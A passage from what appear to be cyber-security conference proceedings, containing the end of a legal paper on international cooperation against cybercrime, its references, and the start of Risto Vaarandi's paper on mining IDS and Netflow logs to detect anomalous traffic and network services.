improve obta<strong>in</strong><strong>in</strong>g evidence <strong>in</strong> transnational context. Thus, states are work<strong>in</strong>g on ref<strong>in</strong><strong>in</strong>g and improv<strong>in</strong>g<br />
the legally and technically possible measures that can be used <strong>in</strong> prosecut<strong>in</strong>g and <strong>in</strong>vestigat<strong>in</strong>g cyber<br />
crime.<br />
Analyses of the recent <strong>in</strong>ternational developments <strong>in</strong>dicate that more and more nations and <strong>in</strong>stitutions<br />
are realiz<strong>in</strong>g the importance of <strong>in</strong>ternational crim<strong>in</strong>al cooperation <strong>in</strong> the context of cyber crime, and publicprivate<br />
partnerships as well as other formal and <strong>in</strong>formal networks are grow<strong>in</strong>gly contribut<strong>in</strong>g to solv<strong>in</strong>g<br />
both national and <strong>in</strong>ternational cyber <strong>in</strong>cidents. Thus, another visible trend of crim<strong>in</strong>al cooperation <strong>in</strong> the<br />
field of cyber crime is the <strong>in</strong>creas<strong>in</strong>g number and the expand<strong>in</strong>g mandate of specialised agencies<br />
address<strong>in</strong>g cyber crime issues.<br />
The challenges and trends above po<strong>in</strong>t to the overall need for more research, awareness about<br />
<strong>in</strong>ternational <strong>in</strong>struments as well as guidance toward proper <strong>in</strong>terpretation and implementation. Perhaps<br />
most importantly, these trends demonstrate that better coord<strong>in</strong>ation between relevant <strong>in</strong>ternational<br />
organisations and a comprehensive understand<strong>in</strong>g of the already exist<strong>in</strong>g legal <strong>in</strong>struments would greatly<br />
benefit the current state of <strong>in</strong>ternational crim<strong>in</strong>al cooperation <strong>in</strong> the cyber doma<strong>in</strong>.<br />
Disclaimer<br />
The op<strong>in</strong>ions expressed here are those of the author and should not be considered as the official policy<br />
of the Cooperative Cyber Defence Centre of Excellence or NATO.<br />
References<br />
Blomfield, A. (2007). Estonia Calls for NATO Cyber-terrorism Strategy. Available at:<br />
http://www.telegraph.co.uk/news/worldnews/1551963/Estonia-calls-for-Nato-cyber-terrorism-strategy.html.<br />
Brenner, S. W. (2010). Cybercrime: Crim<strong>in</strong>al Threats from Cyberspace. ABC-CLIO, California.<br />
Brenner, S. W. and Koops, B.-J. (2004). “Approaches to Cybercrime Jurisdiction”. Journal of High Technology Law,<br />
Vol. 4, No. 1.<br />
Broadhurst, R. (2006). Developments <strong>in</strong> the global law enforcement of cyber-crime. An International Journal of Police<br />
Strategies and Management 29(2). pp. 408-433.<br />
CDL (2010). Cyber Defence League. Available at: http://www.kaitseliit.ee/<strong>in</strong>dex.php?op=body&cat_id=395.<br />
European Union (2000). Council Act of 29 May 2000 establish<strong>in</strong>g <strong>in</strong> accordance with Article 34 of the Treaty on<br />
European Union the Convention on Mutual Assistance <strong>in</strong> Crim<strong>in</strong>al Matters between the Member States of the<br />
European Union.<br />
Council of Europe (2001a). Convention on Cybercrime. Available at:<br />
http://conventions.coe.<strong>in</strong>t/treaty/en/treaties/html/185.htm.<br />
Council of Europe (2001b). Convention of Cybercrime explanatory report. Available at:<br />
http://conventions.coe.<strong>in</strong>t/treaty/en/reports/html/185.htm.<br />
European Union (2005). Council Framework Decision 2005/222/JHA of 24 February 2005 on attacks aga<strong>in</strong>st<br />
<strong>in</strong>formation systems. Official Journal L 69, 67-71.<br />
European Union (2006). Directive 2006/24/EC of the European Parliament and of the Council of 15 March 2006 on<br />
the retention of data generated or processed <strong>in</strong> connection with the provision of publicly available electronic<br />
communications services or of public communications networks and amend<strong>in</strong>g. Official Journal L 105, 54-63.<br />
259
Anna-Maria Talihärm<br />
Council of Europe (2008). Law enforcement - Internet service provider cooperation <strong>in</strong> the <strong>in</strong>vestigation of cybercrime.<br />
Available at:<br />
http://www.coe.<strong>in</strong>t/t/dghl/cooperation/economiccrime/cybercrime/Documents/LEA_ISP/default_en.asp.<br />
Cryer, R. et al. (2007). An Introduction to International Crim<strong>in</strong>al Law and Procedure, Cambridge University Press.<br />
Cybercrime Convention Committee (T-CY) (2010). Fifth meet<strong>in</strong>g Paris, 24-25 June 2010.<br />
Elion (2011). Elion alustab arvutiviiruste ja pahavara vastest ennetustööd. Available at:<br />
http://www.elion.ee/wwwma<strong>in</strong>?screenId=html.bus<strong>in</strong>essprofile.news&componentId=&actionId=&actionParam=49074&menuId=&locale=et&.<br />
Europa Press (2008). Green light to warrantless <strong>in</strong>ternet searches by the police, available at:<br />
http://www.madrid.org/cs/Satellite?c=CM_Revista_FP&cid=1142465573929&esArticulo=true&idRevistaElegida<br />
=1142432125406&language=en&pagename=RevistaDatosPersonalesIngles%2FPage%2FRDPI_home_RDP&<br />
siteName=RevistaDatosPersonalesIngles.<br />
European Union (2009). Annex of Council Decision of 6 April 2009 establish<strong>in</strong>g the European Police Office (Europol),<br />
2009/371/JHA list<strong>in</strong>g forms of serious crime which Europol is competent to deal with <strong>in</strong> accordance with Article<br />
4(1) of the Council Decision.<br />
Europol (2010a). Europol Overview, available at:<br />
http://www.europol.europa.eu/<strong>in</strong>dex.asp?page=ataglance&language=.<br />
Europol (2010b). Europol Strategy 2010–2014, available at:<br />
http://register.consilium.europa.eu/pdf/en/10/st06/st06517.en10.pdf.<br />
Kaska, K., Talihärm, A.-M., & Tikk, E. (2010). Build<strong>in</strong>g a Comprehensive Approach to Cyber <strong>Security</strong>. CCD COE<br />
Publications. Tall<strong>in</strong>n.<br />
Keyser, M. (2003) “The Council of Europe Convention on Cybercrime”. Journal of Transnational Law & Policy. Vol.<br />
12, No. 2, page 289.<br />
Pau, Eneli 2011. Interview with Ms Eneli Pau, Estonian Northern District Prosecutor’s Office, Assistant Prosecutor.<br />
Conducted <strong>in</strong> January 2011 via email.<br />
Pesur, V. (2010). Infosüsteemide arenduskeskus saab võimu juurde. Postimees Onl<strong>in</strong>e, 13 May 2010. Available at:<br />
http://www.postimees.ee/?id=262349.<br />
Ploom, T. (2010). Strasbourgi konventsioonist Lissaboni lep<strong>in</strong>guni, rahvusvahel<strong>in</strong>e koostöö krim<strong>in</strong>aalasjades.<br />
Kirjastus Juura.<br />
Portnoy, M. and Goodman, S. (2009). Global Initiatives to Secure Cyberspace: An Emerg<strong>in</strong>g Landscape. Spr<strong>in</strong>ger<br />
Science+Bus<strong>in</strong>ess Media.<br />
Russell, S. et al. (2004). Cyber Crim<strong>in</strong>als on Trial, Cambridge University Press.<br />
Schaerlaekens, L. (2009). OLAF and its Cooperation with <strong>in</strong> Institutions of New Member States, ed. Joanna Apap,<br />
Justice and Home Affairs <strong>in</strong> the EU: Liberty and <strong>Security</strong> Issues after Enlargement, p. 161.<br />
Tikk, E. and Kaska, K. (2010). Legal Cooperation to Investigate Cyber Incidents: Estonian Case Study and Lessons”.<br />
Proceed<strong>in</strong>gs of the 9th European Conference on Information Warfare and <strong>Security</strong>. Thessaloniki, pp. 288-295.<br />
Tikk, E., Kaska, K., & Vihul, L. (2010). International Cyber Incidents: Legal Considerations. CCD COE Publications.<br />
Tall<strong>in</strong>n.<br />
United Nations (1994). International review of crim<strong>in</strong>al policy - United Nations Manual on the prevention and control<br />
of computer-related crime. No. 43/44.<br />
United Nations (2000). Convention aga<strong>in</strong>st Transnational Organized Crime, adopted by General Assembly resolution<br />
55/25 of 15 November 2000.<br />
United Nations (2004). Legislative Guides for the Implementation of the United Nations Convention aga<strong>in</strong>st<br />
Transnational Organized Crime, available at:<br />
www.unodc.org/pdf/crime/legislative_guides/Legislative%20guides_Full%20version.pdf.<br />
UNODC (2011). Open-ended Intergovernmental Expert Group on Cybercrime. Available at:<br />
http://unodc.org/unodc/en/treaties/expert-group-on-cybercrime.html002E<br />
260
Methods for Detect<strong>in</strong>g Important Events and Knowledge<br />
From Data <strong>Security</strong> Logs<br />
Risto Vaarandi<br />
CCD COE, Tall<strong>in</strong>n, Estonia<br />
risto.vaarandi@ccdcoe.org<br />
Abstract: In modern computer networks and IT systems, event logg<strong>in</strong>g is commonly used for collect<strong>in</strong>g system<br />
health <strong>in</strong>formation, <strong>in</strong> order to ease the system management process. For example, many sites are collect<strong>in</strong>g events<br />
and network flow records from their applications, servers, and network devices over protocols like syslog, SNMP and<br />
Netflow, and analyze these data at central monitor<strong>in</strong>g server(s). Among collected data, many events and records<br />
provide <strong>in</strong>formation about security <strong>in</strong>cidents. Unfortunately, dur<strong>in</strong>g the last decade security logs have grown rapidly <strong>in</strong><br />
size, mak<strong>in</strong>g the manual analysis extremely labor <strong>in</strong>tensive task. This task is further complicated by the large number<br />
of irrelevant records and false positive alerts <strong>in</strong> security logs. For this reason, the development of methods for<br />
detect<strong>in</strong>g important events and knowledge from security logs has become a key research issue dur<strong>in</strong>g the recent<br />
years. In our paper, we propose some methods for tackl<strong>in</strong>g this issue <strong>in</strong> the context of IDS and Netflow logs from an<br />
organizational network. The first contribution of this paper is the study of important properties of IDS and Netflow<br />
logs. We have conducted our analysis on a number of production system logs obta<strong>in</strong>ed from a large f<strong>in</strong>ancial<br />
<strong>in</strong>stitution, and some of our f<strong>in</strong>d<strong>in</strong>gs are supported by results from other researchers. The second contribution of the<br />
paper is the proposal of several data m<strong>in</strong><strong>in</strong>g based and heuristic methods for event and knowledge detection from<br />
security logs. Our data m<strong>in</strong><strong>in</strong>g methods are based on frequent itemset m<strong>in</strong><strong>in</strong>g for identify<strong>in</strong>g regularities <strong>in</strong> IDS alert<br />
sets and network traffic. These regularities are then used for f<strong>in</strong>d<strong>in</strong>g unexpected IDS alert patterns and prom<strong>in</strong>ent<br />
network traffic flows. In this paper, we also discuss the implementations of the proposed methods <strong>in</strong> a production<br />
environment, and provide performance estimates for our implementations. We conclude the paper with a short<br />
discussion on some promis<strong>in</strong>g directions for further research.<br />
Keywords: data m<strong>in</strong><strong>in</strong>g, security log analysis<br />
1. Introduction<br />
In modern computer networks and IT systems, one of the key security management techniques is<br />
network monitor<strong>in</strong>g for detect<strong>in</strong>g unwanted, malicious or anomalous traffic. Two widely employed<br />
methods for network monitor<strong>in</strong>g are the use of network <strong>in</strong>trusion detection system (IDS) and the<br />
collection of network traffic <strong>in</strong>formation with protocols like Netflow or IPFIX. A network IDS sensor<br />
performs deep packet <strong>in</strong>spection (DPI) for a network segment – for every packet that traverses the<br />
segment, the sensor analyzes both the packet headers and its payload. Most network IDSs use signature<br />
based approach for DPI – human experts write packet match<strong>in</strong>g conditions (signatures), <strong>in</strong> order to<br />
recognize known bad traffic (e.g., a signature could be a regular expression for match<strong>in</strong>g the packet<br />
payload). When network traffic matches a signature, IDS triggers an alert which is typically sent to the<br />
central network management server. Unfortunately, IDSs are known to generate large volumes of alerts –<br />
for example, a s<strong>in</strong>gle IDS sensor can emit hundreds of thousands of alerts per day (Vaarandi and Podiņš<br />
2010; Vi<strong>in</strong>ikka, Debar, Mé, Lehiko<strong>in</strong>en and Tarva<strong>in</strong>en 2009). Furthermore, usually the majority of these<br />
alerts are false positives or irrelevant (Julisch 2001; Long, Schwartz and Stoeckl<strong>in</strong> 2006; Vaarandi and<br />
Podiņš 2010). Therefore, the manual review of IDS logs is often impossible.<br />
In contrast, when network traffic <strong>in</strong>formation is collected from routers, switches or dedicated network<br />
probes (with a protocol like Netflow), only data from packet headers are considered. For example, a<br />
Netflow record conta<strong>in</strong>s a transport protocol ID (e.g., 6 for TCP), source and dest<strong>in</strong>ation IP addresses,<br />
source and dest<strong>in</strong>ation ports (if supported by transport protocol), and a few other fields. A Netflow record<br />
is created when the network device first observes relevant traffic flow (e.g., a TCP connection is<br />
established from the workstation 10.2.1.13 port 21892 to the web server 10.1.1.1 port 80). Typically, the<br />
network device sends the record to the central network management host when activity or <strong>in</strong>activity timer<br />
expires for the flow (e.g., no packets have travelled from source to dest<strong>in</strong>ation dur<strong>in</strong>g 15 seconds), when<br />
the flow table becomes full, or when the flow ends (e.g., the correspond<strong>in</strong>g TCP connection is<br />
term<strong>in</strong>ated). S<strong>in</strong>ce collect<strong>in</strong>g network traffic <strong>in</strong>formation does not <strong>in</strong>volve the packet payload analysis, it<br />
requires much less comput<strong>in</strong>g resources than DPI. However, s<strong>in</strong>ce <strong>in</strong> larger networks many millions of<br />
flow records can be created with<strong>in</strong> a short amount of time (Wagner 2008), process<strong>in</strong>g and stor<strong>in</strong>g these<br />
records is expensive <strong>in</strong> terms of CPU time and disk space. In order to reduce these costs, packet<br />
sampl<strong>in</strong>g is usually employed <strong>in</strong> very large networks – traffic <strong>in</strong>formation is only extracted from a fraction<br />
of packets (e.g., 0.1%). Nevertheless, packet sampl<strong>in</strong>g is often not used <strong>in</strong> the context of network security<br />
261
Risto Vaarandi<br />
monitor<strong>in</strong>g, s<strong>in</strong>ce this allows for record<strong>in</strong>g all network packet flows between peers and thus for the<br />
detection of unusual traffic patterns.<br />
In this paper, we will focus on IDS and Netflow log analysis for organizational networks. We will first study<br />
important properties of IDS and Netflow logs and will show that these data sets are prone to conta<strong>in</strong><br />
strong patterns. We will then propose several heuristic and data m<strong>in</strong><strong>in</strong>g based algorithms for analyz<strong>in</strong>g<br />
these logs. The rema<strong>in</strong>der of this paper is organized as follows – section 2 describes related work,<br />
section 3 focuses on properties of IDS and Netflow logs, section 4 describes log analysis algorithms<br />
which harness these properties, and section 5 concludes the paper.<br />
2. Related work<br />
S<strong>in</strong>ce IDS and Netflow logs conta<strong>in</strong> large volumes of data and it is highly impractical to review these logs<br />
manually, their analysis has attracted a considerable amount of attention <strong>in</strong> the research community. A<br />
number of methods have been proposed dur<strong>in</strong>g the last decade, <strong>in</strong>clud<strong>in</strong>g mach<strong>in</strong>e learn<strong>in</strong>g (Pietraszek<br />
2004), time series analysis (Vi<strong>in</strong>ikka, Debar, Mé and Séguier 2006; Vi<strong>in</strong>ikka, Debar, Mé, Lehiko<strong>in</strong>en and<br />
Tarva<strong>in</strong>en 2009), the application of EWMA control charts (Vi<strong>in</strong>ikka and Debar 2004), visualization (Taylor,<br />
Paterson, Glanfield, Gates, Brooks and McHugh 2009), the use of locality paradigm (McHugh and Gates<br />
2003) and chronicles formalism (Mor<strong>in</strong> and Debar 2003), the application of game theory (Wagner,<br />
Wagener, State, Engel and Dulaunoy, 2010), graph based methods (N<strong>in</strong>g, Cui and Reeves 2002), etc.<br />
Among recently proposed methods, data m<strong>in</strong><strong>in</strong>g algorithms have been often suggested for IDS alert logs.<br />
With these methods, IDS alert logs are m<strong>in</strong>ed for previously unknown regularities and irregularities. This<br />
knowledge is then used by human experts for writ<strong>in</strong>g event correlation rules which highlight important<br />
alerts and filter out large volumes of false positives and other irrelevant alerts. Long, Schwartz and<br />
Stoeckl<strong>in</strong> have developed a supervised cluster<strong>in</strong>g algorithm for dist<strong>in</strong>guish<strong>in</strong>g Snort IDS true alerts from<br />
false positives (Long, Schwartz and Stoeckl<strong>in</strong> 2006). Tre<strong>in</strong>en and Thurimella have <strong>in</strong>vestigated the<br />
application of association rule m<strong>in</strong><strong>in</strong>g, <strong>in</strong> order to detect knowledge for writ<strong>in</strong>g event correlation rules for<br />
novel attack types (Tre<strong>in</strong>en and Thurimella 2006). Clifton and Gengo have suggested a similar approach<br />
for creat<strong>in</strong>g IDS alert filters (Clifton and Gengo 2000). Julisch and Dacier have proposed a conceptual<br />
cluster<strong>in</strong>g technique for IDS alert logs (Julisch 2001; Julisch and Dacier 2002; Julisch 2003). With this<br />
approach, detected clusters correspond to alert descriptions, and the human expert can use them for<br />
develop<strong>in</strong>g filter<strong>in</strong>g and correlation rules for future IDS alerts. Al-Mamory, Zhang and Abbas have<br />
proposed cluster<strong>in</strong>g algorithms for f<strong>in</strong>d<strong>in</strong>g generalized alarms which help the human analyst to build filters<br />
(Al-Mamory, Zhang and Abbas 2008; Al-Mamory and Zhang 2009). Vaarandi and Podiņš have developed<br />
a novel data m<strong>in</strong><strong>in</strong>g based method for IDS alert classification (Vaarandi and Podiņš 2010). The method<br />
fully automates the knowledge <strong>in</strong>terpretation process which has been traditionally carried out by human<br />
experts, and derives alert classification rules without a human <strong>in</strong>tervention. These rules are used for<br />
dist<strong>in</strong>guish<strong>in</strong>g important alerts from irrelevant ones.<br />
Various data m<strong>in</strong><strong>in</strong>g methods have also been proposed for the analysis of Netflow logs. Wagner has<br />
applied entropy measurement techniques to Netflow data, <strong>in</strong> order to detect worms <strong>in</strong> fast IP networks<br />
(Wagner 2008). Paredes-Oliva et al. have employed a frequent itemset m<strong>in</strong><strong>in</strong>g algorithm for identify<strong>in</strong>g<br />
traffic flows that are root-causes of network security anomalies (Paredes-Oliva, Dimitritopoulos, Mol<strong>in</strong>a,<br />
Barlet-Ros and Brauckhoff 2010). Li and Deng have proposed several frequent pattern m<strong>in</strong><strong>in</strong>g algorithms,<br />
<strong>in</strong> order to detect network anomalies (Li and Deng 2010). Also, Vaarandi has proposed frequent itemset<br />
m<strong>in</strong><strong>in</strong>g for automated close-to-real-time identification of strong traffic patterns from Netflow logs (Vaarandi<br />
2008).<br />
3. Properties of IDS and Netflow logs<br />
Dur<strong>in</strong>g our experiments, we have discovered several important properties of IDS and Netflow logs which<br />
are confirmed by f<strong>in</strong>d<strong>in</strong>gs of other researchers. When <strong>in</strong>vestigat<strong>in</strong>g the properties of IDS alert log data,<br />
we reviewed the yearly logs of three IDS sensors from a large f<strong>in</strong>ancial <strong>in</strong>stitution. Sensors had more<br />
than 15,000 signatures and were deployed <strong>in</strong> different locations (both <strong>in</strong> <strong>in</strong>tranet and public Internet). Two<br />
logs conta<strong>in</strong>ed more than 50 million alerts and one log more than 2 million alerts.<br />
Firstly, we found that majority of the alerts were triggered only by a few signatures – 10 most verbose<br />
signatures created more than 95% of alerts for two sensors and more than 80% of alerts for one sensor.<br />
Other researchers have reported similar f<strong>in</strong>d<strong>in</strong>gs – <strong>in</strong> (Vi<strong>in</strong>ikka, Debar, Mé and Séguier 2006) it was<br />
found that 5 signatures produced 68% of alerts, while <strong>in</strong> (Vi<strong>in</strong>ikka, Debar, Mé, Lehiko<strong>in</strong>en and Tarva<strong>in</strong>en<br />
2009) the authors discovered that 7 signatures produced 78% of alerts. Secondly, we found that prolific<br />
262
Risto Vaarandi<br />
signatures usually trigger large volumes of alerts over longer periods of time. For three aforementioned<br />
sensors, less than 25 signatures triggered alerts for more than 300 days dur<strong>in</strong>g 1 year period, and these<br />
alerts constituted 70-90% of entries <strong>in</strong> the logs. F<strong>in</strong>ally, vast majority of these verbose signatures trigger<br />
false positives or irrelevant alerts. In our experimental environment, we found that they are mostly related<br />
either to well-known threats (such as MS Slammer Sapphire worm) or legitimate network traffic (like<br />
SNMP queries from network management servers). Similar f<strong>in</strong>d<strong>in</strong>gs have also been reported <strong>in</strong> (Vi<strong>in</strong>ikka,<br />
Debar, Mé, Lehiko<strong>in</strong>en and Tarva<strong>in</strong>en 2009). Therefore, IDS alert logs conta<strong>in</strong> strong patterns <strong>in</strong> many<br />
environments, and these patterns describe commonly occurr<strong>in</strong>g irrelevant alerts.<br />
For <strong>in</strong>vestigat<strong>in</strong>g the properties of organizational Netflow logs, we studied the log of a Netflow probe that<br />
was deployed <strong>in</strong> a backbone network of a large f<strong>in</strong>ancial <strong>in</strong>stitution. The probe collected <strong>in</strong>formation about<br />
network traffic for hundreds of workstations, tens of servers and various other devices without packet<br />
sampl<strong>in</strong>g. The log of the probe covered the period of 14 days and conta<strong>in</strong>ed 104,142,530 Netflow<br />
records. In order to detect changes <strong>in</strong> network usage patterns over time, we divided the 14 day (336<br />
hour) log <strong>in</strong>to 336 non-overlapp<strong>in</strong>g time frames, with each frame cover<strong>in</strong>g 1 hour. In the rema<strong>in</strong>der of the<br />
paper, dest<strong>in</strong>ation address denotes the follow<strong>in</strong>g tuple: (transport protocol ID, dest<strong>in</strong>ation IP address,<br />
dest<strong>in</strong>ation port). Note that Netflow records for portless transport protocols (like ICMP) might use the<br />
dest<strong>in</strong>ation port field for specify<strong>in</strong>g the type of the packet.<br />
Firstly, we noticed that the number of dist<strong>in</strong>ct dest<strong>in</strong>ation addresses is quite large for each time frame –<br />
each frame conta<strong>in</strong>ed an average of 309,948 records and an average of 103,335 dest<strong>in</strong>ation addresses.<br />
However, the majority of dest<strong>in</strong>ation addresses (90-98%, an average of 92.6% per frame) were<br />
associated with only one source IP address. Also, most such dest<strong>in</strong>ation addresses appeared only <strong>in</strong> a<br />
few records dur<strong>in</strong>g short period of time. Furthermore, only 47-121 dest<strong>in</strong>ation addresses had 20 or more<br />
source IP addresses <strong>in</strong> a frame, but 35-46% of Netflow records represented the network traffic to these<br />
few dest<strong>in</strong>ations. When we <strong>in</strong>vestigated these dest<strong>in</strong>ation addresses more closely, we found that they<br />
correspond to widely used network services (for example, corporate mail and web servers). Due to the<br />
large volume of traffic go<strong>in</strong>g to these services, strong patterns that reflect this traffic show up <strong>in</strong> Netflow<br />
logs.<br />
Secondly, when analyz<strong>in</strong>g the network traffic of workstations, we discovered that a typical workstation<br />
communicates with a limited number of IP addresses with<strong>in</strong> 1 hour time frame – the average number of<br />
peer addresses per workstation ranged from 9.8 to 24.7 <strong>in</strong> 336 frames. Thirdly, we also found that many<br />
workstations often communicate only with well-known network services which are simultaneously used by<br />
several other network nodes. Inspect<strong>in</strong>g 1 hour time frames revealed that 68-94% of workstations (an<br />
average of 88.3% per frame) did only <strong>in</strong>teract with network services used by at least 4 other nodes dur<strong>in</strong>g<br />
the same time frame. Other researchers have observed similar regularities <strong>in</strong> workstation network traffic<br />
(McHugh and Gates 2003).<br />
These properties of Netflow log data for organizational networks clearly <strong>in</strong>dicate that such logs conta<strong>in</strong><br />
strong patterns. Furthermore, these patterns often reflect the use of well-known network services (by<br />
workstations and other legitimate clients). For these reasons, the emergence of new and unusual<br />
patterns might be a symptom of an anomalous (and possibly malicious) network activity. In addition, the<br />
discovery of network services from Netflow logs facilitates the identification of illegal services. In the<br />
follow<strong>in</strong>g section we will present several algorithms for address<strong>in</strong>g these issues.<br />
4. Anomaly detection algorithms for Netflow and IDS logs<br />
4.1 Frequent pattern m<strong>in</strong><strong>in</strong>g from Netflow logs<br />
In order to m<strong>in</strong>e patterns from Netflow logs, we propose a frequent itemset m<strong>in</strong><strong>in</strong>g based approach.<br />
Although various frequent itemset m<strong>in</strong><strong>in</strong>g algorithms have been often suggested for various log types<br />
(see (Vaarandi 2004) for references), their application for Netflow data sets is fairly novel and we are<br />
aware of only a few recent works (Vaarandi 2008; Paredes-Oliva, Dimitritopoulos, Mol<strong>in</strong>a, Barlet-Ros and<br />
Brauckhoff 2010; Li and Deng 2010).<br />
Let I = {i1,...,<strong>in</strong>} be a set of items. If X ⊆ I, X is called an itemset. A transaction is a tuple (tid, X), where tid<br />
is a transaction identifier and X is an itemset. A transaction database D is a set of transactions, and the<br />
support of an itemset X is the number of transactions that conta<strong>in</strong> X: supp(X) = |{tid | (tid, Y) ∈ D, X ⊆ Y}|.<br />
If s is a support threshold and supp(X) ≥ s, X is called a frequent itemset. Note that if the support<br />
threshold is specified as a percentage p%, then s = |D|*p/100. If itemset X does not have any proper<br />
263
Risto Vaarandi<br />
supersets with the same support, X is called a closed itemset. In this paper, we focus on m<strong>in</strong><strong>in</strong>g frequent<br />
closed itemsets, s<strong>in</strong>ce they are a compact and lossless representation of all frequent itemsets.<br />
For m<strong>in</strong><strong>in</strong>g patterns from Netflow logs, we are us<strong>in</strong>g LogHound data m<strong>in</strong><strong>in</strong>g tool which has been<br />
developed for efficient m<strong>in</strong><strong>in</strong>g of very large logs (Vaarandi 2004). If a Netflow record reflects a flow of m<br />
network packets between some source and dest<strong>in</strong>ation transport address, we view this record as a set of<br />
m transactions with identical itemset {(sourceIP,1), (sourcePort,2), (dest<strong>in</strong>ationIP,3), (dest<strong>in</strong>ationPort,4),<br />
(protocol,5)}. In other words, we order the five relevant flow record attributes, <strong>in</strong> order to dist<strong>in</strong>guish<br />
identical values of different attributes dur<strong>in</strong>g the m<strong>in</strong><strong>in</strong>g. With this representation, each itemset describes<br />
a traffic pattern, and the support of the itemset equals to the number of packets for this pattern. In the rest<br />
of the paper, we use the terms pattern and itemset <strong>in</strong>terchangeably. Figure 1 depicts some frequent<br />
traffic patterns detected with LogHound.<br />
* * 10.16.23.3 162 17<br />
Support: 161657<br />
10.12.47.1 993 * * 6<br />
Support: 166959<br />
10.13.25.14 80 10.11.48.44 1915 6<br />
Support: 1211532<br />
Figure 1: Sample traffic patterns detected with LogHound<br />
The first pattern reveals that 161,657 UDP packets have been sent from various sources to SNMP trap<br />
collector (port 162/udp) at 10.16.23.3, while the second pattern reflects 166,959 TCP packets sent to<br />
various dest<strong>in</strong>ations from secure IMAP server (port 993/tcp) at 10.12.47.1. The third pattern <strong>in</strong>dicates that<br />
port 1915/tcp at the node 10.11.48.44 has received 1,211,532 TCP packets from the web server (port<br />
80/tcp) at 10.13.25.14.<br />
For m<strong>in</strong><strong>in</strong>g traffic patterns from Netflow data, we propose the follow<strong>in</strong>g framework. After every W second<br />
time <strong>in</strong>terval, frequent closed patterns are detected from the Netflow data of last W seconds and stored to<br />
disk. The content of the file can be viewed over the web by the security adm<strong>in</strong>istrators for gett<strong>in</strong>g a quick<br />
overview of most prom<strong>in</strong>ent recent network traffic patterns. In addition, for each detected pattern the last<br />
N pattern files are scanned, <strong>in</strong> order to detect <strong>in</strong> how many files the pattern is present. If the pattern has<br />
occurred <strong>in</strong> less than K files, the pattern is highlighted as potentially anomalous.<br />
We have implemented this framework for analyz<strong>in</strong>g data from a Netflow probe <strong>in</strong> a backbone network of<br />
a large f<strong>in</strong>ancial <strong>in</strong>stitution (see section 3 for the probe deployment details). We measured the algorithm<br />
performance dur<strong>in</strong>g 21 days, with the support threshold set to 1%, W set to 3600 seconds, N set to 96<br />
and K to 12. In other words, the algorithm m<strong>in</strong>ed patterns once <strong>in</strong> every hour, and highlighted each<br />
pattern which had occurred <strong>in</strong> less than twelve 1-hour w<strong>in</strong>dows dur<strong>in</strong>g the last 4 days. Dur<strong>in</strong>g the<br />
experiment, 56-261 patterns were detected (an average of 182.5 per w<strong>in</strong>dow), and 3-140 patterns were<br />
highlighted (an average of 54.3 per w<strong>in</strong>dow). All highlighted patterns corresponded to system and<br />
network management activity which does not occur rout<strong>in</strong>ely on everyday basis. Thus the algorithm is<br />
able to identify unusual strong network traffic patterns.<br />
4.2 Network service detection from Netflow logs<br />
Identification of network services <strong>in</strong> organizational networks is an important task. Firstly, new legitimate<br />
services are discovered which eases the configuration management process. Secondly, unexpected or<br />
illegal services might be found that violate security policies or have been created with malicious <strong>in</strong>tentions<br />
(e.g., for leak<strong>in</strong>g data to Internet). Today, network services are often detected with dedicated<br />
network/host scann<strong>in</strong>g tools like Nmap. However, scann<strong>in</strong>g larger networks is time-consum<strong>in</strong>g and<br />
requires a lot of network bandwidth. In addition, scann<strong>in</strong>g is an <strong>in</strong>trusive technique which might alert the<br />
illegal service provider. Furthermore, scann<strong>in</strong>g could trigger many alarms <strong>in</strong> the security monitor<strong>in</strong>g<br />
system of the organization itself (e.g., host firewalls might report all their ports that were scanned).<br />
F<strong>in</strong>ally, the illegal service might be protected with a firewall, deny<strong>in</strong>g access for known security<br />
monitor<strong>in</strong>g hosts.<br />
264
Risto Vaarandi<br />
The approach proposed <strong>in</strong> section 4.1 is able to identify actively used network services which receive or<br />
send large amounts of network packets. However, <strong>in</strong> many cases the amount of data sent and received<br />
by services is modest. For example, dur<strong>in</strong>g our experiments described <strong>in</strong> section 4.1 we discovered that<br />
many services exchanged less packets with clients than the support threshold, and thus rema<strong>in</strong>ed<br />
undetected. Unfortunately, lower<strong>in</strong>g the support threshold will substantially <strong>in</strong>crease the number of<br />
patterns, thus mak<strong>in</strong>g it hard for the human to spot patterns that correspond to services. Furthermore,<br />
m<strong>in</strong><strong>in</strong>g large data sets with very low support thresholds will also <strong>in</strong>crease the CPU and memory<br />
consumption of the algorithm.<br />
In this section, we propose a non-<strong>in</strong>trusive algorithm for real-time service detection from Netflow logs.<br />
The algorithm processes Netflow records immediately after their arrival to the network monitor<strong>in</strong>g server,<br />
and employs the follow<strong>in</strong>g heuristic – if the dest<strong>in</strong>ation address is employed for provid<strong>in</strong>g an actively used<br />
service, this address is likely to show up <strong>in</strong> Netflow logs repeatedly dur<strong>in</strong>g longer periods of time. In<br />
contrast, as discussed <strong>in</strong> section 3, most dest<strong>in</strong>ation addresses appear only <strong>in</strong> few records dur<strong>in</strong>g short<br />
time.<br />
The algorithm employs memory based lists L0,…,Ln for dest<strong>in</strong>ation address analysis, where each list is<br />
allocated for dest<strong>in</strong>ation addresses with a certa<strong>in</strong> number of associated source IP addresses. For each<br />
list Li, Wi specifies the size of the analysis w<strong>in</strong>dow <strong>in</strong> seconds and Ti the threshold for number of sources<br />
(Tn is set to <strong>in</strong>f<strong>in</strong>ity; Ti < Ti+1 and Wi ≤ Wi+1, 0 ≤ i < n). These lists allow for treat<strong>in</strong>g more widely used<br />
dest<strong>in</strong>ation addresses differently dur<strong>in</strong>g the analysis, and are also useful for the group<strong>in</strong>g purposes<br />
dur<strong>in</strong>g report<strong>in</strong>g.<br />
For each <strong>in</strong>com<strong>in</strong>g Netflow record, the algorithm applies the follow<strong>in</strong>g steps:<br />
1) extracts the source IP address S and dest<strong>in</strong>ation address D from the Netflow record,<br />
2) if D belongs to list Li, S is appended to the peer list PD; if dur<strong>in</strong>g the last Wi seconds Ti dist<strong>in</strong>ct entries<br />
were appended to PD, D is moved to list Li+1,<br />
3) if D is not present <strong>in</strong> lists L0,…,Ln, D is <strong>in</strong>serted <strong>in</strong>to list L0 and S is appended to PD.<br />
After short time <strong>in</strong>tervals (e.g., once <strong>in</strong> a second), the algorithm checks all dest<strong>in</strong>ation addresses. If the<br />
dest<strong>in</strong>ation address D belongs to Li, entries appended to PD more that Wi seconds ago are removed for<br />
memory sav<strong>in</strong>g purposes. Also, if the dest<strong>in</strong>ation address D belongs to list Li (0 < i ≤ n) and dur<strong>in</strong>g the<br />
